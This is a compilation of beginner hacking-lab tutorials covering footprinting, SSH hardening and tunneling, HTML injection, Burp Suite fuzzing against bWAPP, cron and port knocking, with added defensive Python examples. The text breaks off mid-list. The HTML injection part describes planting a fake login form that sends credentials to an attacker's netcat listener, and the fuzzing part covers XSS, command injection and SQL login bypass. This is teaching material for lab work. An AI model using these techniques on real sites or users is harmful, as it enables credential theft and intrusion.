If you want to search for a particular person using just their name or email, there are specialized websites for it, like pipl.com and lullar.com.

Open pipl.com and type the name of the person you want to search for. For instance, I have searched my own name and, as you can see in the image below, we get a positive result.


Now open lullar.com; here you can search for people by their email and much more. I have searched by email (using my own) and there are positive results in the image below.


Footprinting through social engineering

Social engineering is the art of manipulating human behaviour to our own advantage. It proves most helpful when confidential information needs to be extracted. It relies on the fact that people are unaware of how valuable their information is and have no idea that they are being exploited. The most common example is a caller pretending to be from a credit/debit card company who tries to extract information.

Techniques used for social engineering are:

Eavesdropping
Shoulder surfing
Dumpster diving

Impersonation on social networking sites

This is how footprinting is done through search engines, social networking sites and social engineering. As white hat hackers we should know these techniques, but we should also be aware of them so that we can protect ourselves against footprinting by black hat hackers.

How to setup SSH Pentest Lab

Probing every open port is practically the first step attackers take to prepare their attack. To do its job a server has to keep ports open, but every open port is a potential way in, so one must learn to secure a service even when its port is open.
In this article we harden the SSH server so that an open SSH port cannot be abused. First of all, install the SSH server using the following command:

sudo apt-get install openssh-server


Once the server is installed, start the SSH service by typing:
service ssh start
To confirm that SSH is running, use the following command:
service ssh status


Now that the SSH service is running, scan it from your Kali terminal using nmap:
nmap -sV 192.168.1.17


The scan shows port 22 open with the SSH service. Connect to it using PuTTY: enter the IP address in Host Name along with the port number, select SSH and finally click Open.


On connecting, it asks for the password; enter it and press enter.


How to Secure SSH Connection
Now that SSH is working we can apply our first measure: moving the service off the default port. Open the file /etc/ssh/sshd_config.


Find the line that says Port 22 and change it to Port 2222, then restart the service (service ssh restart) so that the change takes effect.


SSH now listens on port 2222 instead of port 22. Note that this is not port forwarding, and not a security control on its own: it only keeps untargeted scans and brute-force bots quiet, since a full port scan with version detection still finds the service. Let's confirm with nmap.
nmap -sV 192.168.1.17


SSH Connection using Key Pairs
That was our first measure of security. For the second, download and install PuTTY Key Generator (PuTTYgen). Open it and click the Generate button at the lower right.


This generates a public and a private key. Save the private key; it must be kept secret, since whoever holds it can log in.


The private key is saved as shown in the following image. You can name it as you like; I have named it ssh login key.



Now open a terminal on your server and type:

ssh-keygen


The above command creates the .ssh folder in the user's home directory (along with a key pair for that user). Inside .ssh, create an empty text file named authorized_keys.


Copy the "ssh login key.ppk" file created earlier into the .ssh folder. (Only the public half is actually needed on the server; the .ppk is copied here just so that puttygen can read it, and it should be deleted from the server afterwards.)


In the terminal, move into the .ssh folder and type the following command:

puttygen -L "ssh login key.ppk"


This prints the public key in OpenSSH format. Paste it into the empty authorized_keys file created earlier. With the default StrictModes setting sshd ignores the file if it or the .ssh directory is writable by others, so also run chmod 700 ~/.ssh and chmod 600 ~/.ssh/authorized_keys.

Then in the PuTTY configuration go to Connection > Data and set the Auto-login username.


Then open Connection > SSH > Auth and give the path of the private key (ssh login key.ppk) that was generated.


Then in the Session tab give the IP address and the port number, which is now 2222 after our first measure of security.

Click Open. The session opens without asking for a password, because the key is used for authentication.


But this does not stop anyone from logging in with a password, so the server is still exposed to password guessing. Our third measure of security is therefore to disable password authentication completely. For this, open /etc/ssh/sshd_config again.


Here, find PasswordAuthentication, uncomment the line and change its value from yes (as shown in the image above) to no (as shown in the image below). Check the file with sshd -t and restart the ssh service so that the change takes effect.

With these three measures applied, a login requires the private key: password guessing no longer works against this port. If you want to access SSH from another machine, either copy the private key to it or generate a key pair on that machine and add its public key to authorized_keys on the server.
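sshd has two habits that make a hand-edited sshd_config easy to get wrong: for each keyword the first value in the file wins, so a duplicate further down is silently ignored, and a commented-out line leaves the compiled-in default in force. The following added example (written for this page, not part of the article or of OpenSSH) parses a config the way sshd reads it and reports where the effective settings differ from the hardened lab above. The PermitRootLogin expectation is not covered by the article and is added here as a recommendation; the default values are assumed to be those of a current OpenSSH, and both config excerpts are constructed for the example.

```python
# Values expected after the three steps in the article (new port, key-only login),
# plus PermitRootLogin, which the article does not cover (added recommendation).
EXPECTED = {
    "port": "2222",
    "passwordauthentication": "no",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "no",
}
# Compiled-in defaults used when a keyword is absent or commented out (assumed: modern OpenSSH).
DEFAULTS = {
    "port": "22",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "prohibit-password",
}


def parse_sshd_config(text):
    """Effective global settings of an sshd_config.

    sshd uses the FIRST value it meets for a keyword, ignores comments, and
    treats everything after a Match line as conditional, so stop there.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        settings.setdefault(key, value)   # first occurrence wins
    return settings


def audit_sshd_config(text):
    """Findings where the effective value differs from what the hardened lab expects."""
    settings = parse_sshd_config(text)
    findings = []
    for key, want in EXPECTED.items():
        have = settings.get(key, DEFAULTS[key])
        if have.lower() != want:
            findings.append(f"{key} is {have!r} (expected {want!r})")
    return findings


# Constructed excerpts: the stock file with everything commented out, and the lab's result.
STOCK_CONFIG = """# Package-generated configuration file
#Port 22
#PubkeyAuthentication yes
#PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
"""

HARDENED_CONFIG = """Port 2222
PubkeyAuthentication yes
PasswordAuthentication no
PermitRootLogin no
Match User backup
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    print("stock   :", audit_sshd_config(STOCK_CONFIG))
    print("hardened:", audit_sshd_config(HARDENED_CONFIG))
```

Run it against /etc/ssh/sshd_config after editing and before restarting the service; it complements sshd -t, which only checks syntax, not whether the settings are the ones you meant.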

Beginner Guide to HTML Injection

From W3schools
HTML is the standard Hypertext Markup Language used for designing web pages.

·         HTML describes the structure of Web pages using markup.
·         HTML elements are the building blocks of HTML pages.
·         HTML elements are represented by tags.
·         HTML tags label pieces of content such as "heading", "paragraph", "table", and so on.

·         Browsers do not show the HTML tags, but use them to render the content of the page.


HTML Tags
HTML tags are element names surrounded by angle brackets. There are two types of tag: the start tag, also known as the opening tag, and the end tag, also known as the closing tag.


HTML Elements
An HTML element usually consists of a start tag and end tag, with the content inserted in between:


HTML Attributes
Attributes provide additional information about HTML elements. Attributes generally come in the form of name/value pairs like name="value".

Create a web page using HTML

Generally “Notepad” is used for writing HTML code; save the text file with a .html/.htm extension, for example “test.html”, then open the saved file using any web browser.

To create a simple web page, type the following code inside Notepad and save it as test.html.

When you open test.html in a web browser you will see the image given below.

HTML injection is a vulnerability inside a website that occurs when user input is not correctly sanitized and the output is not encoded, so an attacker is able to inject valid HTML code into a vulnerable web page. There are many techniques which use elements and attributes to submit HTML content.

If these methods are provided with untrusted input, there is a high risk of XSS, specifically HTML injection. If strings are not correctly sanitized, the problem could lead to XSS-based HTML injection.

This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.


There are two types of HTML injection, as follows:

·         Stored HTML
·         Reflected HTML

Stored HTML
Stored HTML injection is also known as persistent, because the injected malicious script gets permanently stored inside the web server and the application server gives it back to the user when he visits the respective website. Hence, when the client clicks on the payload, which appears as an official part of the website, the injected HTML code will be executed by the browser. The most common example is the comment option on blogs, which allows users to POST their comments for the administrator or other users.

Example:
An example of a web application vulnerable to stored HTML injection, which allows users to submit an entry in a blog, is shown in the screenshot.


Firstly, user “raj” made a normal entry as the attacker, which was successfully added to the web server database.


Enter the following HTML code inside the given text area to carry out the HTML injection attack.

The above HTML code generates a payload that creates a user login page on the targeted web page and forwards the submitted credentials to the attacker’s IP.


You can see that the login page given below looks valid to the user and gets stored inside the web server.



Now, when the victim opens the malicious login page, he will receive the above web page, which looks official to him, and he will submit his credentials in that page. As he does so, the request will be forwarded to the attacker's IP address.


nc -vlp 80
The attacker will receive the user's credentials as a response in netcat. From the screenshot you can read username=bee&password=bug.
Now the attacker will use these credentials to log in.


Reflected HTML

Reflected HTML injection, also known as non-persistent, occurs when the web application responds immediately to the user’s input without validating it; this lets an attacker inject browser-executable code inside the single HTML response. It is named “non-persistent” since the malicious script does not get stored inside the web server; therefore the attacker sends the malicious link through phishing to trap the user.

The most common occurrence of this kind of vulnerability is in search engines on websites: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will render that HTML.

Example:
The following web page allows the user to submit his first and last name, but these text fields are vulnerable to HTML injection.


Now type the following HTML code in the text field given for the first name, which creates a link to hackingarticles.in when you click on “RAJ”.


Similarly, type the following code in the text field given for the last name:

CHANDEL


Click on the Go button to submit these as first and last name.

From the given screenshot you can see it has submitted RAJ CHANDEL, and the word “RAJ” contains a link to hackingarticles.in; when you click on the link you will be forwarded to hackingarticles.in.
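The first/last name form above is the reflected case: whatever is typed is echoed into the response. The added example below (not code from the original article or from the bWAPP application it shows) puts the vulnerable rendering beside the hardened one, which output-encodes the fields with html.escape, and includes a small parser-based check that tells whether submitted markup survived into the page. The link payload and names are constructed to match the walkthrough.

```python
"""Reflected HTML injection: vulnerable rendering beside the hardened form.
Added example; the input values below are constructed for illustration.
"""
import html
from html.parser import HTMLParser

# Constructed input of the kind the reflected example describes:
# a link wrapped around the first name.
LINK_FIRST_NAME = '<a href="http://www.hackingarticles.in">RAJ</a>'
LAST_NAME = "CHANDEL"


def render_vulnerable(first, last):
    """Echoes the fields verbatim, so injected tags become live markup."""
    return f"<p>Hello {first} {last}</p>"


def render_safe(first, last):
    """Output-encodes both fields: '<', '>', '&' and quotes become entities."""
    return f"<p>Hello {html.escape(first, quote=True)} {html.escape(last, quote=True)}</p>"


class _TagCollector(HTMLParser):
    """Collects start-tag names so markup can be told apart from plain text."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def find_tags(fragment):
    """Return the tag names found in a string (empty list for plain text)."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


def markup_survives(rendered, field_value):
    """True if every tag in the submitted value is still a live tag in the page."""
    submitted = set(find_tags(field_value))
    return bool(submitted) and submitted <= set(find_tags(rendered))


if __name__ == "__main__":
    print(render_vulnerable(LINK_FIRST_NAME, LAST_NAME))
    print(render_safe(LINK_FIRST_NAME, LAST_NAME))
```

find_tags on a user-supplied field is also a cheap server-side signal: a name that parses into any start tag is worth logging, even when the output is escaped, because it shows someone is probing the form.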

Beginner Guide to Website Footprinting

In our previous article we gave a brief introduction to footprinting for gathering information related to a specific person. As we discussed, there are many types of footprinting, and today we are going to talk about DNS footprinting, website footprinting and whois footprinting.

Browsing the target website may provide:
·         Whois details
·         Software used and version
·         OS details
·         Subdomains
·         File names and file paths
·         Scripting platform and CMS details
·         Contact details


Let’s start!!

Whois footprinting
WHOIS (pronounced as the phrase “who is”) is a query and response protocol, and whois footprinting is a method for gathering information about the ownership of a domain name, such as:
·         Domain name details
·         Contact details, including the phone number and email address of the owner
·         Registration date of the domain name
·         Expiry date of the domain name
·         Domain name servers

From Wikipedia
Whois Lookup:
It is broadly used in support of querying databases that store the registered users or assignees of an Internet resource, such as domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. The protocol stores and delivers database content in a human-readable format.
Browse to the URL http://whois.domaintools.com/ in a browser and type any domain name.


For example, let’s search for pentestlab.in.


Now you can see it has produced a whois record for pentestlab.in which contains details like the email address, IP and registrant organisation. From this record anyone can guess that this domain has some connection to Raj Chandel. The attacker then needs to perform footprinting on Raj Chandel, taking help from the previous article.
There are many other tools used for whois footprinting, for example:
Ø  Caller IP
Ø  Whois Analyzer pro
Ø  Whois lookup multiple address


DNS Footprinting
Attackers perform DNS footprinting in order to enumerate DNS record details and the types of servers. There are 10 types of DNS record which provide important information related to the target:
1.      A/AAAA
2.      SRV
3.      NS
4.      TXT
5.      MX
6.      CNAME
7.      SOA
8.      RP
9.      PTR
10.  HINFO


Domain Dossier: an online tool used for complete DNS footprinting as well as whois footprinting.
There are many online tools used for DNS footprinting; using Domain Dossier we will check the DNS records of pentestlab.in: select the check boxes for DNS records and traceroute and then click on Go.

You can observe that the data we received from the whois lookup and from Domain Dossier is the same to some extent. It has given the same email ID as above, i.e. rrajchandel@gmail.com, and moreover the details of the DNS records TXT, SOA, NS, MX, A and PTR.


DNS Dumpster: also an online tool used for DNS footprinting.
DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Enumerate a domain and pull back up to 40K subdomains; results are available in an XLS for easy reference.
Repeating the same process for pentestlab.in, it will search for its DNS records. From the given screenshot you can observe that we received the same details as above. Moreover, it will create a copy of the output as an XLS file.



You Get Signal: also an online tool used for DNS footprinting as well as for network footprinting.
A reverse IP domain check takes a domain name or IP address pointing to a web server and searches for other sites known to be hosted on that same web server. Data is gathered from search engine results, which are not guaranteed to be complete.

Hence we get the IP 72.52.229.111 for pentestlab.in; moreover, it dumped the names of 14 other domains which are hosted on the same web server.

Website Footprinting
It is a technique used for extracting details related to a website, as follows:

1.      Archived description of website
2.      Content management system and framework
3.      Script and platform of the website and webserver
4.      Web crawling  
5.      Extract meta data and contact details from website
6.      Website and web page monitoring and analyzer


Archive.org: an online tool used for visiting archived versions of any website.
Archive.org has a search option, the Wayback Machine, which is like a time machine for any website. It contains information about a website from the past to the present, whether layout or content; everything related to the website is present inside. In simple words, it contains the history of any website.

For example, I searched for the archived record of hackingarticles.in from 2012.



BuiltWith: an online tool used for detecting the technologies and frameworks involved in a running website.

BuiltWith.com technology tracking includes widgets, analytics, frameworks, content management systems, advertisers, content delivery networks, web standards and web servers, to name some of the technology categories.

Taking the example of hackingarticles.in again, we found the following:
·         Content management system: WordPress
·         Framework: PHP


Whatweb
WhatWeb can identify all sorts of information about a live website, like platform, CMS, type of script, Google Analytics, web server platform, and IP address country. A pentester can use this tool as both a recon tool and a vulnerability scanner.

Open the terminal in Kali Linux and type the following command:
whatweb www.pentestlab.in
As a result we receive the same information as above.


Web crawling
HTTrack is a free and open-source web crawler and offline browser, developed by Xavier Roche.

It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site’s relative link-structure. 

Give the target URL to copy the website, www.pentestlab.in, which starts downloading the website.


http://www.hackingarticles.in/5-ways-crawl-website/

Web Data Extractor
Web Data Extractor Pro is a web scraping tool specifically designed for mass-gathering of various data types. It can harvest URLs, phone and fax numbers, email addresses, as well as meta tag information and body text. Special feature of WDE Pro is custom extraction of structured data.

Start a new project, type the target URL as ignitetechnologies.in, select a folder to save the output and click on OK.


Now this tool will extract metadata, email addresses, contact numbers, etc. from the target URL.
From the given screenshot you can see it found 40 meta tags, 1 email address and 84 phone numbers from the ignitetechnologies.in website.
Similarly, another tool used as a web data extractor is:
Web Spider



Competitive Intelligence
Website-Watcher is a powerful yet simple website-monitoring tool, perfectly suited to the beginner and advanced user alike. You can download it from here.

Open a new tab and enter the target URL, which starts monitoring the target website.
For example, I entered the URL hackingarticles.in to monitor this website.
Similarly, there are some other tools used for monitoring:
On web change
Follow that page
Informinder


Time Scheduling on SSH Port

This article is related to network security and helps the network administrator secure a running service on any server by scheduling a task. We are going to schedule a task for the SSH service in order to add another layer of security to the network; in simple words, we are going to set a time limit for the SSH service on the server.
Cron is a UNIX like computer utility which schedules a command or script on your server to run automatically at a specified time and date. A cron job is the scheduled task itself. 
service ssh start
service ssh status

As you can see from the image below, the SSH service is running.



We are going to schedule the SSH service using crontab; crontab is a built-in service of Linux for scheduling tasks.

The user requires root permission to open the crontab; now type the following command:
sudo crontab -e

We opened crontab using nano; the image below shows the crontab interface.


Crontab uses the format “m h dom mon dow [command]”. The following table will help you in writing a schedule for crontab:

Field                      Value
m (minute)                 0-59
h (hour)                   0-23
dom (day of month)         1-31
mon (month)                1-12
dow (day of week)          1-7 [1 stands for Monday]
command                    the required command to be run

Now if we need to schedule a task at 8:00 am on Monday we will write the command as following:
0 8 * * 1 [command]

Now we are going to use crontab to schedule the SSH service. We are going to schedule the ssh service to start after 3 minutes and to stop after 4 minutes once it is activated.
We use the following command for scheduling the task:

* * * * * sleep 180;/usr/sbin/service ssh start
The above command schedules the task with a delay of 3 minutes, where 180 seconds equals 3 minutes; to stop the ssh service after that, type the command given below, where 240 seconds equals 4 minutes.

* * * * * sleep 240;/usr/sbin/service ssh stop

Let’s check whether the above commands are working or not.
Wait for the service to start. Using nmap we scan port 22:
nmap -p 22 127.0.0.1
After scanning you will observe that the ssh service is running and port 22 is open.


nmap -p 22 127.0.0.1
Now, if our command is working properly, it should stop itself after 4 minutes have passed; we check again using nmap.
The port is now closed at the 4th minute.


Now, if I want to schedule a task at a particular time, let’s say I want my ssh service to start at 5:00 am and stop at 5:00 pm, we use these commands:
0 5 * * * /usr/sbin/service ssh start
0 17 * * * /usr/sbin/service ssh stop
These commands schedule the ssh service to start every day at 5:00 am and to stop every day at 5:00 pm.
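Before installing an entry with crontab -e it helps to confirm when it will actually fire. The added example below (not code from the original article) expands the five crontab time fields, including lists, ranges and */step forms that the table above does not cover, and reports whether an entry runs at a given minute or when it next runs. Day-of-week follows cron's convention, where 0 or 7 is Sunday and 1 is Monday, consistent with the table.

```python
"""Evaluate crontab schedules such as the ones used above.
Added example; the entries checked in main() are the article's own lines.
"""
from datetime import datetime, timedelta

# (low, high) bounds for minute, hour, day-of-month, month, day-of-week.
FIELD_BOUNDS = ((0, 59), (0, 23), (1, 31), (1, 12), (0, 7))


def expand_field(spec, low, high):
    """Return the set of integers a single crontab field covers."""
    values = set()
    for part in spec.split(","):
        step = 1
        if "/" in part:                        # "*/5" or "1-30/5"
            part, step_text = part.split("/", 1)
            step = int(step_text)
        if part == "*":
            start, end = low, high
        elif "-" in part:
            start, end = (int(x) for x in part.split("-", 1))
        else:
            start = end = int(part)
        if not (low <= start <= end <= high) or step < 1:
            raise ValueError(f"bad field {spec!r} for range {low}-{high}")
        values.update(range(start, end + 1, step))
    if high == 7 and 7 in values:              # day-of-week: 7 is also Sunday
        values.add(0)
    return values


def parse_crontab_line(line):
    """Split a crontab line into five expanded fields, a day-match flag and the command."""
    parts = line.split(None, 5)
    if len(parts) != 6:
        raise ValueError("expected 'm h dom mon dow command'")
    fields = [expand_field(p, lo, hi) for p, (lo, hi) in zip(parts[:5], FIELD_BOUNDS)]
    # cron quirk: when both day fields are restricted, either one matching is enough
    day_is_or = parts[2] != "*" and parts[4] != "*"
    return fields, day_is_or, parts[5]


def _as_datetime(when):
    return datetime.fromisoformat(when) if isinstance(when, str) else when


def fires_at(line, when):
    """True if the crontab entry runs at the minute given by 'when' (datetime or ISO string)."""
    when = _as_datetime(when)
    (minute, hour, dom, mon, dow), day_is_or, _ = parse_crontab_line(line)
    weekday = when.isoweekday() % 7             # Python Mon=1..Sun=7 -> cron Mon=1..Sat=6, Sun=0
    dom_ok, dow_ok = when.day in dom, weekday in dow
    day_ok = (dom_ok or dow_ok) if day_is_or else (dom_ok and dow_ok)
    return when.minute in minute and when.hour in hour and when.month in mon and day_ok


def next_fire(line, start, horizon_minutes=7 * 24 * 60):
    """First minute at or after 'start' when the entry fires, or None within the horizon."""
    when = _as_datetime(start).replace(second=0, microsecond=0)
    for _ in range(horizon_minutes):
        if fires_at(line, when):
            return when
        when += timedelta(minutes=1)
    return None


if __name__ == "__main__":
    monday = datetime(2024, 1, 1, 4, 30)         # 1 Jan 2024 was a Monday
    for entry in ("0 5 * * * /usr/sbin/service ssh start",
                  "0 17 * * * /usr/sbin/service ssh stop",
                  "0 8 * * 1 [command]"):
        print(entry, "->", next_fire(entry, monday))
```

Note that the `* * * * * sleep 180; ...` form fires every minute, each run sleeping before it acts; next_fire on it returns the very next minute, which is a quick way to see that it is a repeating job rather than a one-off delay.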


Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast.

Fuzzing SQL,XSS and Command Injection using Burp Suite

Hello friends!! Today we are going to perform fuzz testing on the bWAPP application using Burp Suite Intruder; performing this testing manually is time consuming and may be a boring process for any pentester.

Fuzzing plays a vital role in software testing; it is a technique used for finding bugs, errors, faults and loopholes by injecting a set of partially arbitrary inputs, called fuzz, into the application under test. Fuzzer tools take structured input in file format to differentiate between valid and invalid inputs. Fuzzer tools are best at identifying vulnerabilities like SQL injection, buffer overflow, XSS injection, OS command injection, etc.

Let’s start!!

Fuzzing XSS


Start Burp Suite in order to intercept the request and then send the intercepted data to Intruder.


Many input-based vulnerabilities, such as SQL injection, cross-site scripting, and file path traversal, can be detected by submitting various test strings in request parameters and analyzing the application's responses for error messages and other anomalies.

Consider the following settings:

Configure the position where the payload will be inserted; the attack type determines the way in which payloads are assigned to payload positions.

Payload position: test (user input for first name)
Attack type: Sniper (for one payload)


Set the payloads which will be placed into the payload positions during the attack. Choose the Payloads option to configure your simple list of payloads for the attack. Configure the payload list using one of Burp's predefined payload lists containing common fuzz strings.

Burp Suite Intruder contains fuzzing strings for testing XSS injection; therefore choose Fuzzing - XSS and click on the Add button to load these strings into the simple list as shown in the screenshot, and finally click on Start attack.

It will start the attack by sending requests containing the fuzz strings to test for XSS vulnerability in the target application. Now, from the list of applied strings, select the payload with the highest response length, as shown in the given image; we selected request 1, having length equal to 13926.


Insert the selected payload into the intercepted request and then forward this request, as you can see in the given image.


Bravo!! The fuzzing test is completed and it found that the application has a bug which leads to an XSS vulnerability. From the screenshot you can see it is showing an XSS alert prompt.


Fuzzing OS command injection
Similarly, repeat the same process in order to intercept the request and then send the intercepted data to Intruder.


Configure the position where the payload will be inserted; the attack type determines the way in which payloads are assigned to payload positions.

Payload position: www.nsa.gov (user input for target)
Attack type: Sniper (for one payload)


Burp Suite Intruder contains fuzzing strings which test for OS command injection; therefore choose Fuzzing - full and click on the Add button to load these strings into the simple list as shown in the screenshot, and finally click on Start attack.


It will start the attack by sending requests containing arbitrary strings to test for OS command injection vulnerability in the target application. Now, from the list of applied strings, select the payload with the highest response length, as shown in the given image; we selected request 34, having length equal to 13343.
Insert the selected payload into the intercepted request and then forward this request, as you can see in the given image.


Great job!! The fuzzing test is completed and it found that the application has a bug which leads to an OS command injection vulnerability. From the screenshot you can see the application is showing the ID output as per the request of the selected payload.


Fuzzing SQL
Similarly, repeat the same process in order to intercept the request and then send the intercepted data to Intruder.


Configure the position where the payload will be inserted; the attack type determines the way in which payloads are assigned to payload positions. It is much like a brute-force attack.
Payload position: 1:1 (user input for login:password)
Attack type: Cluster bomb (for two payloads)


Burp Suite Intruder contains fuzzing strings which test for SQL injection; therefore choose Fuzzing - SQL Injection for the first payload position and click on the Add button to load these strings into the simple list as shown in the screenshot, and finally click on Start attack.


Similarly, repeat the same process to set the payload option for the second payload position.


It will start the attack by sending requests containing arbitrary strings to test for SQL injection vulnerability in the target application. Now, from the list of applied strings, select the payload with the highest response length, as shown in the given image; we selected request 168, having length equal to 13648.


Insert the selected payload into the intercepted request and then forward this request, as you can see in the given image.


Wonderful!! The fuzzing test is completed and it found that the application has a bug which leads to a SQL injection vulnerability. From the screenshot you can see we logged into Neo’s account without valid input; this happens only as per the request of the selected payload.
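All three runs above pick the interesting request the same way: by eye, looking for the response length that stands out. The added example below (not code from the original article and not Burp's own logic) generalises that step over an exported Intruder-style result table: it takes the median response length as the baseline, flags every result whose length or status code departs from it, and ranks them by deviation. The result rows are constructed for the example, not captured from bWAPP, and the payload column holds labels rather than the fuzz strings themselves.

```python
"""Rank fuzzing results by how far they stray from the baseline response.
Added example; the result rows below are constructed, not real captures.
"""
from statistics import median

# (request number, payload label, HTTP status, response length in bytes)
# Request 0 is Intruder's baseline request with the unmodified parameter.
FUZZ_RESULTS = [
    (0, "baseline", 200, 11890),
    (1, "fuzz-xss-01", 200, 13926),
    (2, "fuzz-xss-02", 200, 11890),
    (3, "fuzz-xss-03", 200, 11912),
    (4, "fuzz-xss-04", 500, 1532),
    (5, "fuzz-xss-05", 200, 11890),
]


def baseline_length(results):
    """Median length as the 'normal' response size, rather than request 0 alone,
    so that one odd baseline request cannot mask every other anomaly."""
    return median(r[3] for r in results)


def score_results(results, tolerance=50):
    """Return (request, label, status, length, reason) for each anomalous result,
    largest length deviation first. 'tolerance' absorbs small, benign variation
    such as a reflected string changing the page size by a few bytes."""
    base = baseline_length(results)
    base_status = results[0][2]
    flagged = []
    for number, label, status, length in results:
        reasons = []
        if status != base_status:
            reasons.append(f"status {status} differs from baseline {base_status}")
        if abs(length - base) > tolerance:
            reasons.append(f"length {length} is {length - base:+.0f} from median {base:.0f}")
        if reasons:
            flagged.append((number, label, status, length, "; ".join(reasons)))
    flagged.sort(key=lambda r: abs(r[3] - base), reverse=True)
    return flagged


def top_candidates(results, limit=3):
    """Request numbers worth replaying manually in the intercepted request."""
    return [r[0] for r in score_results(results)[:limit]]


if __name__ == "__main__":
    for row in score_results(FUZZ_RESULTS):
        print(row)
```

A server error (status 500) is flagged even when its body is short, which the "highest length" rule alone would miss; for injection testing those error responses are often the ones that deserve a second look.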

Beginner Guide to SSL Tunneling (Dynamic Tunneling)

Basically, tunneling is a process which allows data sharing or communication between two different networks privately. Tunneling is normally performed by encapsulating the private network data and protocol information inside the public network transmission units, so that the private network protocol information appears to the public network as data.

SSH Tunnel: tunneling is the concept of encapsulating one network protocol inside another; here we put it inside SSH, so all network communication is encrypted. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, a third use is to hide the nature of the traffic that is run through the tunnels.

Types of SSH Tunneling:
1.      Dynamic SSH tunneling
2.      Local SSH tunneling
3.      Remote SSH tunneling
Let’s Begin!!

Objective: to establish an SSH connection between a remote PC and a local system on a different network.
Here I have set up my own lab, which consists of three systems in the following network:
1.      SSH server (two Ethernet interfaces)
                    i.         IP 192.168.1.22 connected to remote system 192.168.1.21
                  ii.         IP 192.168.10.2 connected to local network system 192.168.10.2
2.      SSH client(local network) holds IP 192.168.10.2
3.      Remote system(outside network) holds IP 192.168.1.21

In the following image we try to explain the SSH tunneling process, where a remote PC with IP 192.168.1.21 is trying to connect to 192.168.10.2, which is on the intranet of another network. To establish a connection with the SSH client, the remote PC will create an SSH tunnel which connects to the local system via the SSH server.


NOTE: the SSH service must be active on the server as well as on the client machine.


The image given below describes the network configuration of the SSH server, showing two IPs, 192.168.1.22 and 192.168.0.1, as explained above.


Another image given below describes the network configuration of the SSH client, showing IP 192.168.10.2.


The remote PC (192.168.1.21) tries to connect to the SSH server (192.168.1.22) via port 22 and logs in to the server successfully.


Similarly, now the remote PC (192.168.1.21) tries to connect to the client PC (192.168.10.2) via port 22; since they belong to different networks, it receives a network error.

Steps for SSH tunneling
·         Use PuTTY to connect to the SSH server (192.168.1.22) via port 22 and choose the option SSH > Tunnels given in the left column of the category list.
·         Give the new forwarded port as 7000 and the connection type as Dynamic, and click on Add at last.
·         Click on Open when everything is set.

This will establish a connection between the remote PC and the SSH server.

Open the previously running PuTTY window, choose the Proxy option from the category list and follow the steps given below:
·         Select the proxy type as SOCKS 5
·         Give the proxy hostname as 127.0.0.1 and the port as 7000
·         Click on Open to establish the connection.


Awesome!! We have successfully accessed the SSH client via port 7000.

How to Perform Local SSH Tunneling

Hello Friends! Previously we discussed SSH tunnels and the steps to perform dynamic tunneling (port forwarding), which you can read from here. Today we will talk about the same scenario and perform local tunneling (port forwarding).
Local tunneling is a process to access a specific SSH client machine for communication. It lets you establish a connection to a specific machine which is not connected to the internet.
The only difference between dynamic tunneling and local tunneling is that dynamic tunneling requires a SOCKS proxy for tunneling all TCP traffic, while local tunneling only requires the destination IP address.
Let’s Begin!!
Objective: to establish an SSH connection between a remote PC and a local system on a different network.
Here I have set up my own lab, which consists of three systems in the following network:
1.      SSH server (two Ethernet interfaces)
                 i.   IP 192.168.1.217 connected to remote system 192.168.1.219
               ii.   IP 192.168.10.2 connected to local network system 192.168.10.2
2.      SSH client (local network) holds IP 192.168.10.2
3.      Remote system (outside network) holds IP 192.168.1.219


The image given below describes the network configuration of the SSH server, showing two IPs, 192.168.1.217 and 192.168.10.1, as explained above.


Another image given below describes the network configuration of the SSH client, showing IP 192.168.10.2.


The remote PC (192.168.1.219) tries to connect to the SSH server (192.168.1.217) via port 22 and logs in to the server successfully.


Similarly, now the remote PC (192.168.1.219) tries to connect to the client PC (192.168.10.2) via port 22; since they belong to different networks, it receives a network error.


Steps for SSH local tunneling
·         Use PuTTY to connect to the SSH server (192.168.1.22) via port 22 and choose the option SSH > Tunnels given in the left column of the category list.
·         Give the new forwarded port as 7000 and the connection type as Local.
·         Give the destination address as 192.168.10.2:22 to establish a connection with the specific client, and click on Add at last.


This will establish a connection between the remote PC and the SSH server.


Open a new PuTTY window and follow the steps given below:
·         Give the hostname as localhost, the port as 7000 and the connection type as SSH.
·         Click on Open to establish the connection.


Awesome!! We have successfully accessed the SSH client via port 7000.

How to Secure Port using Port Knocking

Port knocking is a technique used for sending information through closed ports on a networked computer behind a firewall. It adds security to your network by refusing connections to a particular port until the correct sequence of ports has been knocked. The network administrator configures port knocking using iptables, which acts as the firewall.
An iptables chain allows a client who knows the secret knock to enter the network through a specific port by performing a sequence of connection attempts.

The main purpose of port knocking is to stop an attacker from discovering potentially vulnerable services with a port scan, because if the attacker does not send the accurate knock sequence, the protected ports appear closed.

Port knocking with Iptables

Iptables is a command-line firewall interface to the Linux kernel that uses rule chains to permit or block traffic. It defines various tables, each containing a number of built-in chains, which may also contain user-defined chains. An iptables chain is a list of rules that is used to match a set of packets. Every rule specifies what should be done with the packets that match it.

Type the commands given below, using the following options, which will create new iptables chains:

-F: --flush [chain]
Flush the selected chain (all the chains in the table if none is given). This is equivalent to deleting all the rules one by one.
-X: --delete-chain [chain]
Delete the optional user-defined chain specified. There must be no references to the chain. If there are, you must delete or replace the referring rules before the chain can be deleted. The chain must be empty, i.e. not contain any rules. If no argument is given, it will attempt to delete every non-builtin chain in the table.
-Z: --zero [chain [rulenum]]
